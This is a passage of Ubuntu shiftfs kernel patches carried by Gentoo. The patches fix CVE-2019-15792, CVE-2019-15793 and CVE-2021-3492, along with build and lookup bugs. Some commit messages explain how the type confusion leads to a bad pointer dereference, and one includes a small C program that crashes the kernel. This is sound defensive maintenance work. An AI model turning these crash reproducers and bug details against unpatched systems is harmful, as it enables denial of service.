+ [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ Killed
+ user@ubuntu1910vm:~/shiftfs_confuse$
+
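+A minimal illustrative sketch of the confusion (offsets taken from the
+report above, not from any particular kernel build): for files such as
+/proc/<pid>/environ, file->private_data holds a struct mm_struct *, so
+the unchecked cast overlays two unrelated layouts:
+
+ struct shiftfs_file_info { ...; struct file *realfile; /* +0x10 */ };
+ struct mm_struct         { ...; u64 vmacache_seqnum;   /* +0x10 */ };
+
+The "realfile" load thus reads the vmacache sequence number (~0x4242),
+which the kernel then dereferences as a pointer, as seen in the oops.
+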
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+[ saf: use f_op->open instead as special inodes in shiftfs sbs
+  will not use shiftfs open f_ops ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15792
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 33 +++++++++++++++++++--------------
+ 1 file changed, 19 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9a6a7ad50b90..897e0163005e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 	return 0;
+ }
+ 
+-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+-{
+-	struct file *realfile = file->private_data;
+-
+-	lowerfd->flags = 0;
+-	lowerfd->file = realfile;
+-
+-	/* Did the flags change since open? */
+-	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+-		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+-
+-	return 0;
+-}
+-
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+ 	struct file *realfile;
+@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
+ 	return flags;
+ }
+ 
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct file *realfile;
++
++	if (file->f_op->open != shiftfs_open &&
++	    file->f_op->open != shiftfs_dir_open)
++		return -EINVAL;
++
++	realfile = file->private_data;
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
+ static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+ {
+ 	struct file *file = iocb->ki_filp;
+-- 
+2.39.2
+
+From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 13:35:25 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
+ operations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Several locations which shift ids translate user/group ids into
+init_user_ns before performing operations in the lower filesystem,
+whereas they should be translated into the s_user_ns of the lower
+filesystem. This results in using ids other than the intended ones
+in the lower fs, which will likely not map into the shiftfs
+s_user_ns.
+
+Change these sites to use shift_k[ug]id() to do a translation
+into the s_user_ns of the lower filesystem.
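+
+The helpers perform the translation in two steps, mapping out of the
+source namespace and back into the target namespace (as in the hunk
+below):
+
+ static kuid_t shift_kuid(struct user_namespace *from,
+                          struct user_namespace *to, kuid_t kuid)
+ {
+         uid_t uid = from_kuid(from, kuid); /* kuid as seen in "from" */
+         return make_kuid(to, uid);         /* re-encode in "to"      */
+ }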
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15793
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
+ 1 file changed, 23 insertions(+), 20 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 897e0163005e..04fba4689eb6 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
+ 	put_cred(newcred);
+ }
+ 
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
++}
++
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
++{
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
++
+ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 					 const struct cred **oldcred,
+ 					 struct cred **newcred,
+ 					 struct dentry *dentry, umode_t mode,
+ 					 bool hardlink)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	if (!hardlink) {
+ 		int err = security_dentry_create_files_as(dentry, mode,
+@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
+ 	return 0;
+ }
+ 
+-static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
+-			 kuid_t kuid)
+-{
+-	uid_t uid = from_kuid(from, kuid);
+-	return make_kuid(to, uid);
+-}
+-
+-static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
+-			 kgid_t kgid)
+-{
+-	gid_t gid = from_kgid(from, kgid);
+-	return make_kgid(to, gid);
+-}
+-
+ static void shiftfs_copyattr(struct inode *from, struct inode *to)
+ {
+ 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
+@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct iattr newattr;
+ 	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+ 	err = setattr_prepare(dentry, attr);
+@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 		return err;
+ 
+ 	newattr = *attr;
+-	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+-	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
++	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
+ 
+ 	/*
+ 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
+@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	kuid_t fsuid = current_fsuid();
+ 	kgid_t fsgid = current_fsgid();
+ 
+@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 		return -ENOMEM;
+ 	}
+ 
+-	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
+-	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
++	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
+ 
+ 	/* clear all caps to prevent bypassing capable() checks */
+ 	cap_clear((*newcred)->cap_bset);
+-- 
+2.39.2
+
+From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 17 Jan 2020 16:17:06 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
+ negative during unlink
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1860041
+
+All non-special files (for shiftfs, special files only include fifos
+and - in this case - unix sockets, since we don't allow character and
+block devices to be created) go through shiftfs_open() and have their
+dentry pinned through this codepath, preventing it from going negative.
+But fifos don't use the shiftfs fops but rather the pipefifo_fops, which
+means they do not go through shiftfs_open() and thus don't have their
+dentry pinned that way. As a result, the lower dentries for such files
+can go negative on unlink, causing segfaults. The following C program
+can be used to reproduce the crash:
+
+ #include <stdio.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <sys/types.h>
+ #include <sys/stat.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+
+ int main(int argc, char *argv[])
+ {
+        struct stat stat;
+
+        unlink("./bbb");
+
+        int ret = mknod("./bbb", S_IFIFO|0666, 0);
+        if (ret < 0)
+                exit(1);
+
+        int fd = open("./bbb", O_RDWR);
+        if (fd < 0)
+                exit(2);
+
+        if (unlink("./bbb"))
+                exit(4);
+
+        fstat(fd, &stat);
+
+        return 0;
+ }
+
+Similar to ecryptfs we need to dget() the lower dentry before calling
+vfs_unlink() on it and dput() it afterwards.
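+
+The resulting pattern in shiftfs_rm() (condensed from the hunk below):
+
+ dget(lowerd);                   /* pin the lower dentry              */
+ ...
+ err = vfs_unlink(loweri, lowerd, NULL);
+ ...
+ dput(lowerd);                   /* drop the pin once we are done     */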
+
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 04fba4689eb6..3623d02b061e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	int err;
+ 	const struct cred *oldcred;
+ 
++	dget(lowerd);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	inode_unlock(loweri);
+ 
+ 	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 10 Apr 2020 16:55:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872094
+
+When shiftfs is nested we failed to create any files or access
+directories because we recorded the wrong creator credentials. We
+need to record the credentials of the creator of the lower mark mount
+of shiftfs. Otherwise we aren't privileged with respect to the shiftfs
+layer in the nesting case. This is similar to how we always record the
+user namespace of the base filesystem.
+
+Suggested-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3623d02b061e..5c39529d0a17 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * parent mark mountpoint.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
++			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		} else {
+ 			sbinfo->mnt = mntget(path.mnt);
+ 			dentry = dget(path.dentry);
+@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			 * are identical.
+ 			 */
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+-		}
+ 
+-		cred_tmp = prepare_creds();
+-		if (!cred_tmp) {
+-			err = -ENOMEM;
+-			goto out_put_path;
++			cred_tmp = prepare_creds();
++			if (!cred_tmp) {
++				err = -ENOMEM;
++				goto out_put_path;
++			}
++			/* Don't override disk quota limits or use reserved space. */
++			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++			sbinfo->creator_cred = cred_tmp;
+ 		}
+-		/* Don't override disk quota limits or use reserved space. */
+-		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
+-		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 20 May 2020 13:44:27 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
+ from other users
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1879688
+
+Stéphane reported a bug found during NorthSec, which makes heavy use of
+shiftfs. When a subvolume or snapshot is created as userns root in the
+container and then chowned to another user, a delete as the root user
+will fail. The reason for this is that we drop all capabilities as a
+safety measure before calling btrfs ioctls. The only workable fix I
+could think of is to retain the CAP_DAC_OVERRIDE capability for the
+BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
+invasive.
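+
+Condensed from the hunk below: after all capabilities are cleared in the
+override creds, CAP_DAC_OVERRIDE is raised again, but only for
+BTRFS_IOC_SNAP_DESTROY and only when the caller is the container's root:
+
+ if (cmd == BTRFS_IOC_SNAP_DESTROY) {
+         kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
+         if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
+                 cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
+ }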
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5c39529d0a17..5d88193b41db 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
+ 	return ret;
+ }
+ 
+-static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
+ 					const struct cred **oldcred,
+ 					struct cred **newcred)
+ {
+@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
+ 	cap_clear((*newcred)->cap_inheritable);
+ 	cap_clear((*newcred)->cap_permitted);
+ 
++	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
++		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
++		/*
++		 * Allow the root user in the container to remove subvolumes
++		 * from other users.
++		 */
++		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
++			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
++	}
++
+ 	put_cred(override_creds(*newcred));
+ 	return 0;
+ }
+@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	if (ret)
+ 		goto out_restore;
+ 
+-	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
+ 	if (ret)
+ 		goto out_fdput;
+ 
+-- 
+2.39.2
+
+From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Mon, 15 Jun 2020 15:16:11 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
+ fiemap definitions
+Cc: mpagano@gentoo.org
+
+shiftfs FTBFS with 5.8-rc1:
+
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
+ /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
+
+It seems that shiftfs was getting linux/fiemap.h included
+indirectly before. Include it directly.
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 5d88193b41db..f9a5c94a9793 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -20,6 +20,7 @@
+ #include <linux/posix_acl.h>
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
++#include <linux/fiemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Tue, 23 Jun 2020 19:46:16 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
+ lookups
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1872757
+
+Users reported that shiftfs returns ESTALE when creating temporary
+files. This can be reproduced via:
+
+import tempfile
+import os
+
+def test():
+    with tempfile.TemporaryFile() as fd:
+        fd.write("data".encode('utf-8'))
+        # re-open the file to get a read-only file descriptor
+        return open(f"/proc/self/fd/{fd.fileno()}", "r")
+
+def main():
+   fd = test()
+   fd.close()
+
+if __name__ == "__main__":
+    main()
+
+a similar issue was reported here:
+https://github.com/systemd/systemd/issues/14861
+
+Our revalidate methods were very opinionated about whether or not a
+lower dentry was valid; in particular, when it became unlinked we simply
+invalidated the lower dentry, which caused the above bug to surface.
+This has led to bugs where an ESTALE was returned for e.g. temporary
+files that were created and directly re-opened afterwards through
+/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
+/proc/<pid>/fd/<nr>, LOOKUP_JUMP is set and the vfs will revalidate via
+d_weak_revalidate(). Since the file has been unhashed or has even
+already gone negative, we'd fail the open when we should have succeeded.
+
+Reported-by: Christian Kellner <ckellner@redhat.com>
+Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Link: https://github.com/systemd/systemd/issues/14861
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f9a5c94a9793..3cfd1881e9a2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 		struct inode *loweri = d_inode(lowerd);
+ 
+ 		shiftfs_copyattr(loweri, inode);
+-		if (!inode->i_nlink)
+-			err = 0;
+ 	}
+ 
+ 	return err;
+-- 
+2.39.2
+
+From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 30 Dec 2020 11:10:20 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
+Cc: mpagano@gentoo.org
+
+After commit:
+
+ 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
+
+__close_fd() has been renamed to close_fd() and the files parameter has
+been removed.
+
+Change the shiftfs code to properly support this change.
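+
+The adaptation is mechanical; the dropped files argument was always
+current->files in shiftfs:
+
+ __close_fd(current->files, fd);   /* before 5.11 */
+ close_fd(fd);                     /* 5.11 onward  */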
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 3cfd1881e9a2..4f1d94903557 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	__close_fd(current->files, fd);
++	close_fd(fd);
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	/*
+ 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
+ 	 * take a reference here to offset the one which will be put by
+-	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 * close_fd(), and make sure that reference is put on fdput(lfd).
+ 	 */
+ 	get_file(lfd.file);
+ 	lfd.flags |= FDPUT_FPUT;
+-- 
+2.39.2
+
+From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:01:06 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
+ shiftfs_btrfs_ioctl_fd_replace() error paths
+Cc: mpagano@gentoo.org
+
+Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
+allocated near the top of the function. Fix up these error paths to free
+the memory.
+
+Additionally, the addresses for the allocated memory are assigned to
+return parameters early in the function, before we know whether or not
+the function as a whole will return success. Wait to assign these values
+until we know the function was successful, and for good measure
+initialize the return parameters to NULL at the start.
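+
+The resulting shape (condensed; see the full hunks below):
+
+ *b1 = NULL;                       /* callers never see stale pointers */
+ *b2 = NULL;
+ ...
+ if (!ret) {                       /* publish only on success          */
+         *b1 = v1;
+         *b2 = v2;
+ } else {
+         shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ }
+ ...
+ err_free:                         /* early-failure paths free both    */
+         kfree(v1);
+         kfree(v2);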
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 28 +++++++++++++++++++++-------
+ 1 file changed, 21 insertions(+), 7 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 4f1d94903557..8eab93691d62 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
++	*b1 = NULL;
++	*b2 = NULL;
++
+ 	if (!is_btrfs_snap_ioctl(cmd))
+ 		return 0;
+ 
+@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		if (IS_ERR(v1))
+ 			return PTR_ERR(v1);
+ 		oldfd = v1->fd;
+-		*b1 = v1;
+ 	} else {
+ 		v2 = memdup_user(arg, sizeof(*v2));
+ 		if (IS_ERR(v2))
+ 			return PTR_ERR(v2);
+ 		oldfd = v2->fd;
+-		*b2 = v2;
+ 	}
+ 
+ 	src = fdget(oldfd);
+-	if (!src.file)
+-		return -EINVAL;
++	if (!src.file) {
++		ret = -EINVAL;
++		goto err_free;
++	}
+ 
+ 	ret = shiftfs_real_fdget(src.file, &lfd);
+ 	if (ret) {
+ 		fdput(src);
+-		return ret;
++		goto err_free;
+ 	}
+ 
+ 	/*
+@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+ 		fdput(lfd);
+-		return *newfd;
++		ret = *newfd;
++		goto err_free;
+ 	}
+ 
+ 	fd_install(*newfd, lfd.file);
+@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		v2->fd = oldfd;
+ 	}
+ 
+-	if (ret)
++	if (!ret) {
++		*b1 = v1;
++		*b2 = v2;
++	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++	}
++
++	return ret;
++
++err_free:
++	kfree(v1);
++	kfree(v2);
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 9 Apr 2021 13:10:37 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
+ correctly
+Cc: mpagano@gentoo.org
+
+shiftfs expects copy_to_user() to return a negative error code on
+failure, when it actually returns the amount of uncopied data. Fix all
+code using copy_to_user() to handle the return values correctly.
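+
+copy_to_user() returns the number of bytes left uncopied (0 on success),
+so its result must be converted to an errno rather than propagated, e.g.:
+
+ if (copy_to_user(arg, v1, sizeof(*v1)))
+         return -EFAULT;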
+
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+CVE-2021-3492
+Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 8eab93691d62..abeb7db3b9be 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 	kfree(v1);
+ 	kfree(v2);
+ 
+-	return ret;
++	return ret ? -EFAULT: 0;
+ }
+ 
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 		*b2 = v2;
+ 	} else {
+ 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
++		ret = -EFAULT;
+ 	}
+ 
+ 	return ret;
+-- 
+2.39.2
+
+From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Mon, 9 Aug 2021 17:15:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1939301
+
+Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
+caused a regression for us. It states:
+
+> default_file_splice_write is the last piece of generic code that uses
+> set_fs to make the uaccess routines operate on kernel pointers.  It
+> implements a "fallback loop" for splicing from files that do not actually
+> provide a proper splice_read method.  The usual file systems and other
+> high bandwidth instances all provide a ->splice_read, so this just removes
